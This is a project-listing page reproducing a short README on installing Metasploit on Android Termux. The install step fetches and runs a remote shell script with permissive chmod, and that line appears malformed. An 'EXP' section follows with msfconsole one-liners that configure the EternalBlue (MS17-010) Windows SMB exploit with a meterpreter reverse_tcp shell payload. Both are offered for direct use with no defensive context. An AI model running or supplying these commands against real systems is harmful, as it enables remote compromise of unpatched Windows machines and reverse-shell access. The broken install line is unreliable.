All Projects → jas502n → msfconsole-termux

jas502n / msfconsole-termux

Licence: other
How To Install Metasploit-Table on the Android Termux

Programming Languages

shell
77523 projects

msfconsole-termux

How To Install Metasploit-Table on the Android Termux

pkg  update

apt-get install curl wget -y

wget https://raw.githubusercontent.com/jas502n/msfconsole-termux/master/metasploit.sh |chmod 777 metasploit.sh && ./metasploit.sh


EXP

msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue;set payload windows/x64/meterpreter/reverse_tcp;set ProcessName explorer.exe;show options"


msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue;set payload windows/meterpreter/reverse_tcp;set ProcessName explorer.exe;show options"

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].